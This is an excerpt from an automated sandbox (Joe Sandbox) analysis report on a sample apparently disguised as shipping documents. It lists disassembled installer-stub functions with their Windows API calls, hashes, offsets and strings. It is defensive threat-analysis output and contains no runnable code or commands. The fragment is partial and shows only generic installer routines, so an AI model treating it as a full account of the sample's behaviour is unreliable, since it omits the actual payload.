                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                • String ID:
                                                • API String ID: 3751793516-0
                                                • Opcode ID: 0bff73914de4e6eed910c0ec0e64b32a9aea0308159657b3b0e440d9c8159a1f
                                                • Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
                                                • Opcode Fuzzy Hash: 0bff73914de4e6eed910c0ec0e64b32a9aea0308159657b3b0e440d9c8159a1f
                                                • Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E
                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                  • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                • String ID:
                                                • API String ID: 1404258612-0
                                                • Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                • Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
                                                • Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                • Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68
                                                APIs
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                                                  • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                  • Part of subcall function 00405663: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                  • Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695
                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 3585118688-0
                                                • Opcode ID: e2e2f1a1846438e0669df5bc00fb77d2eadfb6d246281b8a1ec737ff05b26262
                                                • Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
                                                • Opcode Fuzzy Hash: e2e2f1a1846438e0669df5bc00fb77d2eadfb6d246281b8a1ec737ff05b26262
                                                • Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00405135
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405186
                                                  • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                • Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
                                                • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                • Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405BA1
                                                • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403356,00436000,00436800), ref: 00405BBC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: nsa
                                                • API String ID: 1716503409-2209301699
                                                • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                • Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
                                                • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                • Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q$$]q
                                                • API String ID: 0-858218434
                                                • Opcode ID: 7a97e7336043cb171f1c798390091a4e20a1f3a58307cabc70894a9398c9a409
                                                • Instruction ID: 793f2c235e2f1b72e66b2c56a86f7b368edc0152e4f7e3a7ed008036b6b5bce2
                                                • Opcode Fuzzy Hash: 7a97e7336043cb171f1c798390091a4e20a1f3a58307cabc70894a9398c9a409
                                                • Instruction Fuzzy Hash: 6CB12C34A00209CFDB18DF69C994A9EB7B6EF84304F648D29D406EB765DB75DC86CB80
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                • CloseHandle.KERNEL32(?), ref: 00405695
                                                Strings
                                                • Error launching installer, xrefs: 00405676
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                • Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
                                                • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                • Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                • Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
                                                • Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                • Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                • Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
                                                • Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                • Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                • Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
                                                • Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                • Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                • Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
                                                • Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                • Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                • Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
                                                • Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                • Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                • Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
                                                • Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                • Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR]q$LR]q$$]q$$]q
                                                • API String ID: 0-3527005858
                                                • Opcode ID: a0144eb6e7eccb8406328a237c27ac798ce638cb4b10364c43b0fc13c64ea3ad
                                                • Instruction ID: 4c8b7ca3be0ec755728df2a9570908d161f968954dd8eb3b0c933f124f2162e2
                                                • Opcode Fuzzy Hash: a0144eb6e7eccb8406328a237c27ac798ce638cb4b10364c43b0fc13c64ea3ad
                                                • Instruction Fuzzy Hash: 2C51B0347002059FDB18DF28C990A6AB7E6FF88304F148969E915EB3A5DB30EC46CB95
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                • Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
                                                • Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                • Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q$$]q
                                                • API String ID: 0-858218434
                                                • Opcode ID: 4c340ba6cf3d994120f4e89b45b0b08557a0388bc38595921a5b3a5e62dafdfa
                                                • Instruction ID: 74bd737efa16eebfae9384fdac6228f00eb02c802d4ec0b59b7221655fd8bdb5
                                                • Opcode Fuzzy Hash: 4c340ba6cf3d994120f4e89b45b0b08557a0388bc38595921a5b3a5e62dafdfa
                                                • Instruction Fuzzy Hash: 5E518E74A00204CFDB15EB68D980ADEB3B6EF88350F708969E815E7755DB35EC4ACB81
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                • lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
                                                • CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
                                                • lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301268315.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.3301254297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301283521.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301297297.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.3301317510.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                • Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
                                                • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                • Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9